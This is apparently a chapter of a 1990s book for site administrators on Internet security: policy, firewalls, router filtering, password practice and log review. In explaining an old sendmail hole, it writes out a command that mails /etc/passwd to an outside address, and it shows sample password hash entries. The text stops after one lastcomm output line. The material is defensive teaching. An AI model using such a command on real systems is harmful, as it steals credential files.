With additional Internet connections being added every day, the management of any Internet site should be concerned with security issues. No site that is connected has absolutely foolproof security, but with the proper knowledge and education, an adequate security level can be maintained to suit the requirements of any organization.
This chapter explains many of the primary issues surrounding Internet security. It is designed to prepare the beginning site administrator or help managers understand system security issues that should be included in the Internet site installation.
Connection to the Internet provides a vast collection of information tools to the corporate or educational user. But for every positive use of the Internet's tools, there is a dark side where people plot to maliciously misuse services. Maintaining the proper level of security at your site can help ensure that people will gain the most from this vast resource of information technology. The following pages explain some basic concepts, tools, and organizational skills needed to maintain various levels of security on the Internet computer resource. These skills can be the "ounce of prevention" needed to guard against a security-related catastrophe in your organization.
Most popular Usenet newsgroups post a document called a FAQ (short for Frequently Asked Questions). Recently, there was such a posting in the newsgroup comp.security.misc. The article mentions that implementing computer security can turn ordinary people into rampaging paranoids.
Often, after a system break-in, everybody wants to jump on the bandwagon of system security. People who may be bored with their own job want to play the exciting game of securing the castle from the bad guys. This becomes even worse when the system administrator goes overboard and loses focus of the primary reason why the computer is connected to the Internet.
Unfortunately, such extreme paranoia often ends up rendering the computer overly restrictive and difficult to use. The FAQ article stated that one university system administrator banned the head of a department from the college mainframe for using a restricted network utility. In the end, the system administrator had a difficult task justifying his implementation of computer security to an unsympathetic department committee.
People can take computer security too far and get caught up in the excitement or knowledge that they may be doing battle with a movie-like computer monster. They forget that the computer is attached to the Internet to provide a positive support service and a competitive advantage to the organization. There must be a balance between responsibly managing the security of an Internet system and providing a system that is easy to use from the network user's standpoint.
I enjoy living in a city where the presence of security is almost hidden from view. When I walk the streets, I don't see barbed wire and bars on every window. I use city services—such as the buses, pay phones, outdoor cafes, and highways—free of hassle. Only once in a while do I see a firearm or interact with the police to ensure that my activities and possessions remain "safe."
My attitude about computer security is the same. When a group of people use the Internet, they want to freely enjoy accessing the resources of the great network. As they access and move information around the globe, they do not want to be hampered by productive services that have been turned off, or have to perform easy tasks in a way that needs pages of notes to accomplish, or endure daily badgering from the system administrators about security.
Remember that beginning computer users usually are afraid their ignorance will lead to trouble. If your Internet environment maintains an attitude of paranoia, you may be hampering productivity and restricting the education the network can provide. An effective environment should encourage people to take advantage of network technology but still ensure a responsibility to maintain the security of the organization's environment and the protection of user files.
Some sites contain classified or highly confidential information. Computers that contain this level of information should not be on the Internet at all. For those sites, highly advanced security mechanisms should be in place and a great effort should be made to secure the data. You should consider your site sensitive if any of the following conditions apply:
One of the tasks of securing a system is to define a security philosophy or plan. This is commonly referred to as a site security policy.
A smart businessperson always creates a business plan before venturing into an investment. When attaching a computer to the Internet, it is prudent to know how you will handle network security. This action is part of being responsible and well organized.
The security policy should include how you plan to prevent break-ins, detect break-ins, and educate users not to blindly contribute to break-ins by opening security holes on your computer.
When creating a policy, you should understand the following:
The site manager should understand what the "appropriate" use of the Internet is and understand what level of performance will be maintained on the system. Before creating your site security policy, be sure to get a copy of RFC 1244 (Request for Comments 1244, available at ftp://is.internic.net:rfc/rfc1244.txt). This document is entitled Site Security Handbook and outlines exactly what your security policy should cover. The IETF Security Policy Working Group (SPWG) also is working on a set of recommended security policy guidelines for the Internet network.
When creating a security policy, the level of security should be planned by estimating the cost of installation and maintenance versus return on investment.
Unless you are part of a very large organization, computer security is probably only one of many responsibilities you have. Generally, security must be implemented so that a single person can be responsible for protecting the organization's assets but can also remain free to perform many other services at the same time.
Time is money and this realization must be figured into the security equation. Checking daily logs, monitoring security programs, and viewing user activity takes a lot of effort and a large amount of time. One of the most expensive parts of maintaining an organization is the payroll expense. Time is expensive and should be used effectively. Some of the tools and concepts mentioned in this chapter can be used to effectively manage the security of a system in a cost-effective manner.
Your security policy also should reflect the computer and network equipment used to maintain the security at your site. Will you create a firewall? How much does a firewall cost to implement? Can your budget afford it? How much time will different types of equipment save you? Is what you are protecting worth the investment? Figure 11.1 compares the cost of various security configurations in terms of cost and value.
FIGURE 11.1. Security investment strategies (Cost = man-hours + capital expense).
If you are not a network guru or a computer wizard, I recommend setting up a simple firewall and dedicating one computer to providing Internet connectivity.
Most computers that provide Internet networking services run the UNIX operating system. There are many security tools on the Internet to help minimize the time spent managing UNIX security while providing a healthy degree of system security.
Recently, I have been experimenting with the Windows NT Advanced Server. I expect that future implementations of Internet connectivity will include other popular operating systems. Vendors such as Microsoft have built into their software many security mechanisms that greatly enhance site protection from a possible Internet attack. For example, the Windows NT Advanced Server has been designed to conform to government C2 security standards.
When planning a policy design for Internet connectivity, a system manager should have a clear idea of how restrictive the environment will be to users.
Why are you connecting to the Internet in the first place? Probably to provide your user community with a range of services that provide information. The key is to define that range so that users can freely access information without being discouraged by security restraints.
Remember that typical users are unsure of themselves. In light of this, the Internet connection should not be a bad experience. On the other hand, you don't want to leave security doors wide open for an amateur cracker. The whole purpose of this chapter is to help provide the average system manager who is connecting to the Internet some sensible security guidelines.
One of the first lessons to learn is terminology. For a long time, people have misused the term hacker to mean cracker. In the Internet community, a cracker is a person who maliciously attempts to break into other people's computer systems.
Once a person breaks into a computer, they spend valuable resource dollars (especially if the authorized user pays a monthly bill for the service). Even worse, a cracker typically rearranges the operating system's functionality with back doors, Trojan horses, games, or open security holes for others. The ultimate disaster is when a cracker erases files or disks, cancels programs, or crashes a system. In the PC world, the term cracker is used to describe someone who tampers with copy protection software to illegally distribute the program.
The more accepted meaning of the term hacker is a person who has expertise in the area of computing and networking. A hacker enjoys digging into how an operating system interoperates with a network and invents methods of expanding the capabilities of a system. Hackers on my systems usually help me find security holes and help keep the operating system tuned so that users benefit. A hacker can become a cracker when the individual crosses an ethical line and uses his or her talents in an illegal or unprofessional manner.
Rarely do crackers attack systems for monetary gain. Typically, crackers attack as a test of their skills, to gain status with their peers, as a game, or (more commonly), to use your computer as a stepping-stone to break into another computer. Most crackers cover their tracks to make apprehension difficult.
Another possibility is that your competitors may want to break into your system to secure information that would help them succeed against you in the marketplace. This happens very infrequently compared to other reasons.
A possible source of computer break-ins is from employees or ex-employees. With the recent recession and large number of layoffs in the corporate world, a cracker of this type usually carries a grudge. I have heard about ex-employees changing a computer firm's source code enough to ensure that new product releases fail. Because many of these people are amateur crackers who do not spend a great deal of time breaking into computer systems, they typically use an entry point left exposed when they left the company. (This is another important reason to stay organized.) A small degree of prevention and the implementation of some standard security tools can protect your system from harm.
Eugene Spafford, in a paper entitled "Are Computer Hacker Break-Ins Ethical?," presents five false justifications of why people break into computers or create vandalware:
Crackers will break in to multiple computers (I have seen more than 10 break-ins during a single episode) to make it difficult to find their point of origin. This activity is known as connection laundering in the Internet world.
An example of this is when the cracker logs in to five computers one at a time to perform a malicious stunt on a sixth computer. To track this cracker, the management of all six computers must log the person's activity and turn the logs into a central coordinator like CERT (defined later). This coordinator compares the logs and traces the movements of the cracker through each system.
You can see why it is usually difficult to prove the guilt of a cracker. That doesn't mean it is impossible, because the authorities do catch people and (usually) confiscate their equipment. Most crackers like to boast about their conquests and leave activity trace logs on their local systems as proof of their deeds. It is very important to maintain a system that makes break-ins difficult. If a cracker can't break into your system with a few simple tools, they will likely move to another system.
As discussed later in this chapter, it is very important to maintain user activity logs. You cannot track or detect possible break-ins without adequate activity logs.
If you want to read about an administrator who lured and studied an active cracker at AT&T Bell Laboratories, read an article by Bill Cheswick entitled "An Evening with Berferd, in Which a Cracker Is Lured, Endured, and Studied." Bill and his staff created a "chroot" jail where the cracker unknowingly logged in to a restrictive environment. The staff then watched as the cracker attempted to use an arsenal of cracking tools to gain control of the system. The administrators were able to gain useful information to improve the security of their systems. At the end of their observation, the cracker attempted to erase all the disks on the computer system. Most occurrences of an Internet related break-in are not catastrophic and are usually done as a challenge or a game.
Now that you've learned about who breaks into a computer, why people break into computers, and what they do once they are in, it is time to discuss how people break into computers.
To understand how people break in, you must understand the following aspects of your system:
This sounds like a large amount of information to cover. Yet a very basic understanding of these topics can help you protect computers from an outside threat on the Internet.
One of the key elements of computer security is understanding the connection to the Internet. The more you understand this link, the greater success you will have with security tools. Internet links typically range from low-cost dial-up solutions to higher-cost leased lines. Their functionality ranges from user-to-LAN connectivity to LAN-to-LAN connectivity. As you know, part of your investment cost is the associated cost of the Internet link. Each of the links described in the following sections affects the amount of time you spend monitoring security.
NOTE For more detail on the different types of Internet connections, see Chapter 7, "Finding Access as a User," and Chapter 8, "Finding Access as an Organization."
The lowest cost Internet connection is when you have PC accounts on an Internet computer and leave the security to someone else. Most Internet service providers sell you an account on their Internet computer you can use for Internet connectivity.
Typically, the user dials in using a PC modem and a communications software package. This is one of the best ways to find out whether the Internet is useful to your organization without making a large initial investment. The only security you need to implement here is to teach users about maintaining secure passwords and to make sure that they don't abandon the account. A cracker typically looks for an account that is seldom or never logged on to. In that way, there is less chance the authorized account user will detect and report a break-in.
An even lower-cost method of using Internet electronic mail is to get a CompuServe or America Online account for your computer users. Again, sensible password security should be demonstrated by the person who uses the account.
A low-cost purchased account should never be shared by multiple users. This is a security gap that is taken advantage of by many crackers. When a group of people want joint access to the Internet network, they should have separate accounts. If an intruder breaks in and runs your bill up into the thousands of dollars, you want to go to one responsible person to trace account activity. When multiple people share an account, the password is rarely changed and is typically shared publicly. There have been cases in which people allow children or friends to use their accounts—thus creating more opportunity for security to be breached and operators to open up security holes on the system.
If you are setting up Internet access using a bank of modems or terminal servers, you should take some precautions. Misconfigured hardware easily creates an open security door for an intruder. Make sure that the following items are checked before allowing people to use the modem equipment:
You should check the terminal server manuals, system manuals, and modem manuals for the proper configuration of each device.
A example of a security enhancement to dial-up modems is a security box. SecureID from Security Dynamics in Cambridge, MA, sells such a box. The system gives each user a credit card-sized device that electronically displays a generated personal identification number (PIN). The remote user must use this PIN number, along with a password, to log in to the security box and then in to the computer system. The security box changes the PIN numbers at regular intervals so that the device must be present at login time.
When the organization has enough people who desire access to the Internet, or when the information obtained from the Internet is very large in size, a faster and more efficient link can be used.
The latest addition to many Internet service provider connections has been the dial-up router connection. This provides a link between your network and the Internet network (an arrangement commonly referred to as LAN-to-LAN connectivity) using the public phone lines. In this case, your local network is now part of the ever-expanding Internet network. Your users have direct access to the Internet from local computers and, conversely, the Internet community has access to your local computers.
Very cheap security solutions include the installation of a SLIP connection. SLIP is an implementation of TCP/IP, which operates over a serial line. The SLIP connection can provide a network link between two computers using modems and ordinary phone lines. One modem dials another, and the network connection takes place.
After the birth of SLIP came a more advanced solution called Point-to-Point Protocol (PPP). A PPP connection is more efficient and provides security through the enhancement of CHAP (Challenge Handshake Authentication Protocol). The use of CHAP requires a three-way handshake between the dial-up network devices using encrypted passwords. These passwords are changed using a hashing function each time the devices connect. This makes it virtually impossible for an intruder to gain access through a dial-up-IP connection into your network.
Typically, in a dial-up-IP solution, a dial-up router is used to provide the connectivity. The router is a device that passes information packets between the segment of the Internet network to which you are connected and your local network. The Internet information could be a file transfer, remote login, Gopher information, or many of the other information tools available. The router can be programmed to support your security philosophy and discourage break-ins. The best routers for Internet connectivity provide a high degree of filtering and logging and enable you to control when the connection can be made.
Packet filtering is the ability of the router to selectively pass only the packets you specify into or out of your local network. The selection process can be based on host computers, network segments, or service types. In other words, you can limit the hosts who talk to the Internet, what internal networks communicate with the Internet, and what tools can be used on the Internet connection.
A dial-up router provides a high degree of filtering. The filtering can be by host, network, or protocol. If your security philosophy wants to allow only FTP (file transfer), Gopher, and the WWW and wants to disallow remote logins from the Internet, appropriate filters can provide this protection.
The modem on the dial-up router can be set to allow Internet connectivity only during certain hours or specific days. Most crackers conduct break-ins during evenings or weekends to lessen the chances of someone detecting their activity.
If your router is set to allow Internet connectivity only during normal business hours, most Internet crackers will not be interested in your system. Employees or ex-employees usually work during business hours and may not be able to become "midnight crackers" if you block access during the evenings or weekends. Again, such filtering should match your security philosophy and your target of service functionality (and availability) to best suit your organizational needs.
When your Internet traffic needs grow, you can justify the cost of a leased line. Leased lines can range from a 56 Kbps line up to higher speeds. What you choose depends purely on your pocketbook. This type of connection uses a router much like the dial-up connection does. However, instead of there being "bandwidth on demand," as is so in the dial-up solution, the leased line provides a constant connection to the Internet by using a direct permanent line between you and the Internet service provider.
A popular router used for a leased-line Internet solution is the cisco router. It has the same filtering capabilities as the dial-up router, although you cannot maintain the hours of operation as you can with the dial-up line. The cracker usually has access to your computers at a more acceptable speed than the dial-up solution. It is common for a site directly connected to the Internet to extend security beyond the filtering on the router by designing some sort of advanced firewall system.
An adequate level of security can be maintained by combining knowledge of computer security issues, the security features a vendor can provide on networking equipment, public domain security software, and adequate user education. What level of security is needed? That should be outlined in your security policy.
In many universities, all networks have open access to the Internet. In an atmosphere of open learning, any user can directly use the resources of the Internet without the hindrances of security mechanisms that may inhibit network services.
Many corporations may want to provide Internet tools, such as FTP, Gopher, WAIS, and the WWW on the desktop workstation. This means that every network in the corporate environment may be left open to the risk of attack. The corporation's Internet security policy must include a mechanism to protect certain sensitive hosts from being open to attack.
The benefit of such an arrangement is increased productivity by letting users conveniently access Internet resources from a highly productive Macintosh or PC. Many users may not use the Internet if you require them to log in to a single Internet-connected host to access Internet information, especially if the procedure makes them learn about the complicated UNIX environment.
Blindly attaching your local area network to the Internet without some way of protecting hosts that store competitive or sensitive information is an open invitation for security problems.
One of the simplest protection methods is to ensure that your router to the Internet supports filtering. Such routers are called screening routers. Many popular routers support packet filtering at the host level, network level, and service (protocol) level. Information is carried on the Internet network in various size packets. Each information packet carries with it a description of the source, destination, and service type (login, mail, and so forth), which enables routers to selectively filter unwanted data.
Routers can be configured to prohibit traffic from going from the Internet to an internal host or internal network subnet (an internal network can be divided into management pieces called subnets). Routers also can be configured to prohibit traffic that participates in dangerous services such as tFTP (trivial file transfer without passwords) and lpd (remote printing).
An example of the intelligent use of filters is to set up a filter to allow only electronic mail to reach one host on your local network. From there, the specified host can distribute the mail internally, thus reducing the number of hosts that have e-mail contact with the Internet. The famous Internet worm exploited a bug in the sendmail e-mail program and used it to gain access to many hosts throughout the Internet. Router filtering is one method of reducing the security risk at your facility.
Firewalls tend to be a compromise between ease of use and security. The local network that is available to the Internet network can be considered the "zone of risk." Without a firewall, your entire local network becomes a zone of risk.
A firewall reduces your zone of risk by defining a smaller area that is accessible to the Internet. By defining a smaller zone of risk, you reduce the area you need to cover to detect an Internet intruder. There are many configurations of firewalls using various components and configurations. By using only a screening router (as mentioned in the preceding section), you set up a simple firewall that reduces the area you have to worry about for security purposes.
Two basic approaches exist. The first is to design a firewall to prohibit any service that is not explicitly permitted through the Internet connection. If you don't tell your users that a service is available, turn it off.
The second approach is just the opposite. It involves designing a firewall where all services not explicitly prohibited are permitted. The difference is that, in the first case, the firewall is designed to block everything and services are enabled one by one after careful risk assessment. In the second case, the administrator must plot out the weak points in security and then disable those services that are too risky to leave available. The users often perceive the first approach as constricting and view the firewall as a hindrance to productivity. The second approach allows the users more freedom to use the Internet resources—and gives them more freedom to create security holes in your firewall configuration.
Recent efforts have been made to increase the security of Internet electronic mail. The enhancements center around the transparent encryption of the mail message. Using this method, electronic mail would be able to move around the Internet; servers en route to the message's destination could not read their contents.
In the present form of electronic mail (using the SMTP protocol), most mail messages are text and can be read by anyone who captures them. A growing issue concerning Internet privacy is the ethical concern of system administrators reading electronic mail to detect security infractions.
Most Internet services use well-known ports to communicate. A system administrator can select which services to leave on and which to turn off through various mechanisms that limit port access.
When an organization asks for a connection to the Internet, it usually has a basic idea what it wants the connection for. It may be to provide file transfer (FTP) service to a specific user base, enable members to communicate with professional peers (e-mail), or enable the organization to participate in technical discussions (Usenet news, mailing lists).
A wealth of information is also provided by Gopher, the WWW, and WAIS. Many online database systems are available through the Internet using the remote login program, Telnet. Your Internet security policy should state which services and functionality the connection will provide. I recommend turning off any other service you do not want to offer. These "other" services can open the door of opportunity for an intruder.
Many well-known security organizations recommend that some of your services be filtered on your Internet router. These services are considered dangerous and do not have to be operated on the Internet. It is recommended that the following list of services be filtered:
System administrators should know what services they want to offer through the Internet. Any other service should be filtered through the router. You can obtain a list of the services you want by looking in the assigned numbers FAQ: is.internic.net:rfc/rfc1700.txt.
Many users may keep a file named .rhosts in their home directories. This file lists "trusted" users from other systems that are allowed to log in to the account without a password. It also allows remote commands like rsh and rcp to be operated without a password.
The rsh command enables a remote person to issue a command without logging in. The rcp command enables a person to copy a file without ever logging in to the system. My recommendation is that .rhosts files are dangerous and should not be allowed on your Internet system. Run a nightly program that erases these files from your user accounts. You can send the users an automated message stating that the system security policy does not allow the .rhost file. Removing these files can anger your users, but every system administrator has to make that choice.
The exception may be the root account (remote execution may be required for network backups). But many vendor-supplied backup mechanisms have security workarounds so that you do not even need a root-owned .rhost file.
You can use the showmount command to show remote mounted file systems on a file server. Generally, on a UNIX system, the /etc/exports file lists the systems allowed to remote mount your file system.
It is dangerous to let a computer on the Internet be a file server for other systems. You should at least filter out NFS packets on your Internet router, but a better move is to turn off NFS completely on your Internet computer system. Many dangerous security holes surround access to your file systems.
Trusted hosts are usually other computer systems that are thought of as secure and need a smaller degree of security when accessing your system. The list is commonly found in a file named /etc/hosts.equiv on a UNIX system. Trusted hosts can access services such as remote printing and file sharing without requiring passwords or security constraints. Be very careful about which hosts are trusted on the system connected to the Internet network.
The NIS (Network Information System, formerly called Yellow Pages) is a network database shared by multiple computers.
Typically, there is an NIS server and NIS clients. The NIS server contains information about accounts, passwords, remote file sharing, trusted hosts, and other important security information. In the past, many security bugs were found in the NIS system (these bugs are fixed in more recent versions of the database system).
Before using NIS on a network connected to the Internet, make sure that you study how each client and server file should be set up. It is very easy to accidentally create a large security hole just by leaving the default NIS configuration active or by mistyping a line in an operating system configuration file.
Software security holes provide a common entry point for Internet intruders. The problem resides in poorly written programs distributed with the operating system. These programs allow a user to operate them for reasons other than their original purpose.
One of the most publicized examples of a software bug has been the sendmail debug security hole. The Internet worm used it to exploit systems throughout the entire Internet network. The Internet worm also took advantage of a bug in the fingerd (finger daemon) program.
With every new release of an operating system, new security holes are created. The best way to close up these holes is to subscribe to an active security mailing list so that you will be notified immediately each time a new hole is found. If you maintain an older system, check the FTP archives at cert.org to get a list of discovered security holes in various operating systems.
Backups should be part of every well-run operation. If you are connected to the Internet, make sure that you run backups on a regular basis.
If an intruder breaks into a system, he or she may remove or change files. Once the break-in is detected, a good backup can help you clean up the system and put things back in order. Once, I watched someone break into a computer and change a user's account during the evening. After I locked the intruder out, I was able to quickly restore the account using backups. The next morning, the regular account user was not affected and resumed work not knowing that his account had been changed the night before (although I did have a talk with him later about creating a more secure password and keeping an eye out for peculiar things in his account).
One of the most vulnerable places on a computer system is the password file—typically named /etc/passwd on a UNIX operating system. The password file is the first point of attack. It has been found that more than 80 percent of all computer attacks from outside of networked systems are based on exploitation of weak passwords. A cracker can use a variety of techniques to access your password file. For a number of years, there was a security bug in the sendmail program (a program used to manage the e-mail system on a computer). A cracker could attach to the e-mail port of a computer, turn on debug mode, and then issue a command like this one:
mail user@anywhere.com < /etc/passwd
The e-mail system would then mail your password file to the cracker. Other security holes like this one presented similar access to the password file. Most well-known bugs have been fixed, and it is important that you have these fixes installed. Many of them have been fixed in newer releases of operating systems provided by vendors.
Once the cracker has your password file, he or she uses a program like CRACK and a dictionary of common passwords to try and guess your password. To write his paper "Foiling the Cracker: A Survey of, and Improvements to, Password Security," Daniel Kline collected nearly 15,000 account entries to test for "easy-to-guess passwords." He found that 21 percent of all passwords had been broken by the first week of testing. In the end, he could crack about 25 percent of the passwords. The scariest thing is that it took him only 15 minutes to crack 386 passwords (2.7 percent). I have never managed a system for which the password file was foolproof. On a regular basis, I run my own version of CRACK against my system password files and can usually break into at least one account on every system. One password is all a cracker needs to access your computer system.
Another area in which a smart system administrator must be organized is accounts. An account should always have a password. I have seen some engineers using accounts without passwords to make it easier to share group data between users. Having such a password system on the Internet (or any network) is an open invitation for an intruder to gain access to information.
An account should have an expiration date. Accounts that are no longer in use are the best targets for system intruders. Once crackers break into an unused account, they can work with a smaller chance of being detected. Placing expiration dates on accounts ensures that the accounts are removed in a timely manner when they are no longer needed.
Guest accounts are a good way to lower the level of security on a system. Having accounts for which you cannot link account responsibility to a single person is dangerous. You will never know whether there is a cracker on your system or a guest is exploring. Any guest account should have a unique name and password solely restricted to that person. Each guest should be assigned their own account with an expiration date. When the account expires, the account should be closed unless it is specifically requested to be reopened. Group accounts should be avoided on the Internet system. Again, not having a link of responsibility to a single person makes it difficult to monitor the account activity of a potential intruder.
One way of protecting your password file is by using a shadow password file. If you turn on the C2 security option offered under SunOS, you can see how a shadow password file is used. The encrypted password is stored in a separate secure location from the other password information. The /etc/passwd file simply stores a place holder entry. The examples below show the difference between a regular password file and one using a shadow password mechanism.
Here is a sample password file /etc/passwd (readable by all users):
mike:CNjlEZIADBdP6:145:17817:Mike Allison:/home2/mike:/bin/csh
jason:NZErd3xZxPkpLE:5001:20:Jason Hendrix:/home/jason:/bin/csh
caldwell:XDghFYD:350:20:Tom Caldwell:/home2/caldwell:/bin/csh
A sample password file with shadowing for /etc/passwd (readable by all users):
mike::145:17817:Mike Allison:/home2/mike:/bin/csh
jason::5001:20:Jason Hendrix:/home/jason:/bin/csh
caldwell::350:20:Tom Caldwell:/home2/caldwell:/bin/csh
A sample shadow password file (not readable by any user except the root):
mike:CNjlEZIADBdP6:6445
jason:NZErd3xZxPkpLE:6445
caldwell:XDghFYD:6445
By using the shadow password file, crackers have a much harder time getting to the information needed to guess passwords. They must find another way to break into your system and must spend more time and effort doing it.
People who use easy-to-guess passwords provide an open door to the cracker. Passwords should not be written down on paper or kept in desk drawers. Proper password education should be included in a site security policy that all users are issued when they receive accounts. The following password information should be included in such a site security policy.
Password Dos and Don'ts:
Some security experts suggest that you select a line from a favorite poem or song, then use the first letter of each word in your password. For example, "when the lights go down in the city" provides the password WtlgditC. Another recommendation is to join two words with a punctuation character. An example is toy+boat or little;bighorn.
Many system administrators run a password cracking program much like the ones crackers use. Do so at regular intervals to help catch an easy-to-guess password before an intruder does. You can tailor these cracking programs the same way a cracker does. One of the most popular cracking programs is CRACK. It can be obtained from many public domain archives on the Internet network.
A more advanced method of preventing the use of passwords that can be easily guessed is to run a password creation program that has built-in password intelligence. These programs can enforce your password policies by keeping a user from creating an unsecured password. Two such programs are NPASSWD and Passwd+.
Many people don't understand how their passwords travel over the network when they log in to a computer. When a remote user logs in to an account on the Internet, the information flows over the network medium organized into packets.
Think of these packets as envelopes. Each one on the outside contains an address of where the information should go, a return address, and some other information that is needed for the network to process the packet. Finally, there is the content of the envelope, or the data area. When you use the U.S. Postal Service, you seal the envelope so that it is difficult for mail carriers to read the contents of your envelopes. On an Ethernet network, the information inside the packet is just as accessible as the address information. If you log in to a computer in New York from California, every piece of equipment that transfers your typed-in password can easily read and store this information. You basically have to trust that the management of each segment between California and New York provides a secure environment through which your packet travels.
The Ethernet network is a broadcast network. When you type your password on the remote computer, the Ethernet broadcasts the information to every computer on the network. This is akin to a person yelling in a crowded room.
If a college student sets up his or her computer in promiscuous mode, he or she can watch every packet on the network. It would not take much effort to create a packet-filtering program to watch for login packets and capture your login information (including your password). The password information is not encrypted and is readily available in the data portion of the packet.
It is a smart idea to know where your packet travels and who can see it. Does your organization share a network with the company next door? Does your computer exist on the same segment as the computer science lab at the local university?
The administrator should have an understanding of the network topology surrounding the Internet connection. (Another reason why people shouldn't use the same password for different computers.) If one of your users logs in to an account at a remote university and someone is monitoring packets, he or she can use the password information to break into your local systems.
An add-on authentication system that maintains a higher degree of security on the network is called Kerberos. Named after the three-headed watchdog that guards the gates of Hades in Greek mythology, Kerberos effectively authenticates every user for every application.
To implement this system, a server is installed to maintain three components: a database, an authentication server, and a ticket-granting server. The database contains all network user names, their passwords, the network services the users can access, and a service encryption key. To use a service, the person needs a ticket and an authenticator. This provides the security needed to ensure that the entity accessing the service remotely is actually the authorized user. The information transferred over the network is encrypted to keep crackers from viewing the access information in the packet.
Firewalls use a variety of components and configurations to reduce the risk of security problems. As mentioned earlier in this chapter, a simple screening router can be used to create an Internet firewall (Figure 11.2 shows a screening router example). Rockwell International uses a screening router as a "Telnet diode." The Telnet diode allows outgoing Telnet connections to the Internet but prohibits incoming Telnet connections to internal hosts. This arrangement enables employees to freely log in to remote Internet servers but keeps malicious users from attacking internal computers.
FIGURE 11.2. Screening router example.
Another component of a firewall is to use a "bastion host." Bastions are highly fortified parts of medieval castles that often focus on critical areas of defense. A bastion host is usually slated to provide many Internet services—such as electronic mail distribution, FTP file service, and Gopher services.
The bastion host usually receives extra security attention and is monitored more frequently than other network hosts. Some configurations of these type of hosts are called proxy gateways or application level gateways. Software programs are run on the host and act as forwarders for services such as electronic mail or Usenet news.
The services offered on a bastion host can be interactive, such as FTP or Telnet. Digital Equipment Corporation operates bastion hosts that act as proxy gateways for FTP and Telnet. These hosts filter the FTP and Telnet packets between the Internet and the internal DEC network—transparently to the user. A bastion host can be on the Internet but be accessible only to the local internal network by using a protocol other than TCP/IP (the Internet is based on this communication protocol). See Figure 11.3.
Figure 11.3. One example of a bastion host with a terminal server.
These types of bastion hosts often are called hybrid gateways because they use a combination of protocols to limit Internet access to the internal network. Access to the hybrid gateway can be made through serial lines or IP tunneling. A terminal server can be used to gain serial access to the hybrid gateway and then on to the Internet.
IP tunneling means taking the Internet IP information packet and enclosing it in another protocol such as X.25. You can think of it as taking an Internet envelope of information that arrives at your corporate mail room, stuffing it in a larger envelope after verifying it is not malicious in content, and then using a different carrier service to deliver it to your office. One example of a corporate firewall that uses a hybrid design is AT&T's connection to the Internet. This design prevented the famous Internet worm from infecting any of the AT&T computers during the 1988 Internet worm crisis.
One implementation of a bastion host is to install two network boards in the computer. One network board is connected to the Internet and the other network interface is connected to your local internal network. This is known as a dual-homed gateway (see Figure 11.4).
FIGURE 11.4. A dual-homed gateway.
Traffic is not allowed to pass from one network interface board to the other. The most secure version is one in which logins are not allowed on the dual-homed gateway. If an intruder login occurs, it can be detected immediately and dealt with quickly. However, this adaptation does not provide very many Internet services to your local organization and may be overly restrictive. By forcing your users to first log in to the dual-homed gateway to use Internet connectivity, you can focus your attention on a single point of connectivity and also provide some Internet flexibility to the user.
The drawback of this configuration is that once the intruder gains access to an account on the gateway, he or she has access to every host in your internal network. The attacker also can turn on routing between the two network interfaces and open up your entire network to attack. One advantage is that you can restrict the gateway's use during certain hours of the day or shut it down if there are security problems. It is a convenient way to manage your organization's access to the Internet.
A combination of a screening router and a bastion host can be set up to provide a screened host gateway (see Figure 11.5). In this configuration, the bastion host is the only host that can be seen from the Internet network. The screening router permits only a small number of services to communicate with the bastion host.
FIGURE 11.5. Screened host gateway.
In this configuration, the screening router is sometimes referred to as the choke to funnel the packets through a narrow gap. The users must first log in to the bastion host to access any Internet resources. This focuses the administrator's attention on only two components: the router and the bastion host. The bastion host is also referred to as the gate in this configuration of a firewall. This firewall focuses any potential intruder's attention on only two components. Such an arrangement limits the battlefield and reduces the complexity of your security risk.
Another common firewall configuration is to create a subnet that is connected to the Internet but is isolated from the rest of your local network by a screening router. You can put a bastion host or any other hosts on the isolated subnet to provide Internet services. Traffic between the Internet and the screened subnet is allowed. Traffic between your local network and the screened subnet is allowed. However, traffic between the Internet, across the screened subnet, and into your local network is blocked by the screening router. Some experts refer to this subnet as a secure subnetwork (see Figure 11.6).
FIGURE 11.6. A screened subnet example.
How do you know when your system has been compromised? It can take some effort to uncover a break-in if your system has not been significantly altered. By looking at logs, obscure events, high-resource utilization, and other out-of-the ordinary events, an administrator can detect a possible break-in.
Detecting a break-in can be done by using many of the public domain tools available on the Internet network. COPS is a good tool for detecting break-ins (it is described later in this chapter). When working on the system, you can run the w command to see what your users are doing and how much of the computer resources they are using.
Familiarity with the typical habits of your users not only helps you keep an eye out for peculiar events, but also helps you manage system resources. The command (on a BSD UNIX system) ps -ax lists all running programs (known as processes) on the computer. Typically, a program named crack or scsh might appear suspicious to your security-conscious eyes. Another tool commonly used for detecting break-ins is TCP Wrappers, discussed later in this chapter and freely available on the Internet.
Another method of detecting intruders is looking in the logs. A command such as last lists all the recent logins and where they originated. The following example shows the output from the last command when run on a Sun 3/60 computer with the name server.xxx.com:
lars ttyp9 Eskimo.CPH.XXX.C Tue Nov 16 14:21 - 15:06 (00:44)
paul FTP Oak-Street.XXX.C Tue Nov 16 14:13 - 14:16 (00:02)
FTP FTP netcom4.netcom.c Tue Nov 16 13:42 - 13:55 (00:13)
price ttypd JACKSON.XXX.COM Tue Nov 16 13:38 - 15:08 (01:29)
prasad ttyp6 Drakes.XXX.COM Tue Nov 16 13:29 - 14:33 (01:03)
FTP FTP staff.cc.purdue. Tue Nov 16 13:09 - 13:11 (00:02)
FTP FTP netcom4.netc.com Tue Nov 16 12:43 - 12:50 (00:07)
james ttyp7 netcom4.netc.com Tue Nov 16 13:03 - 13:05 (00:01)
rao ttyp9 131.143.66.12 Tue Nov 16 12:40 - 14:17 (01:36)
As you can see, there are a number of local logins to the computer named server.xxx.com. Also notice that the anonymous FTP login was used to gain access to public files on the server (the user FTP). The user james logged in from a host called netcom4.netc.com right after someone used an anonymous FTP login from the same origin. This looks suspicious and may be worth investigating. Realizing that the user james was on vacation all last week can raise even more doubts about the credibility of the login.
The syslog file is another place to watch for attempts at break-ins. All attempts and successes at accessing system-level privileges are recorded in this log. Following is a sample syslog file:
Nov 28 16:15:58 spectrum login: REPEATED LOGIN FAILURES ON ttyp3 FROM
mcl.xxx.edu, user1
Nov 28 19:58:11 spectrum login: ROOT LOGIN ttyp0 FROM cmcserver.XXX.COM
Nov 28 20:15:29 spectrum su: 'su root' failed for caldwell on /dev/ttyp0
The first entry shows that someone at the host mcl.xxx.edu repeatedly tried to log in and was unsuccessful. The second entry shows that the root system user logged in from the host cmcserver.xxx.com. The last entry shows that user caldwell tried to gain full-system privileges by becoming the root user. All these entries could be security-related events and should be investigated.
If you think an account may be used maliciously by someone, use the lastcomm command to display a list of commands they recently have run. Here's a sample lastcomm command output:
csh S rao __ 2.00 secs Tue Nov 23 12:42
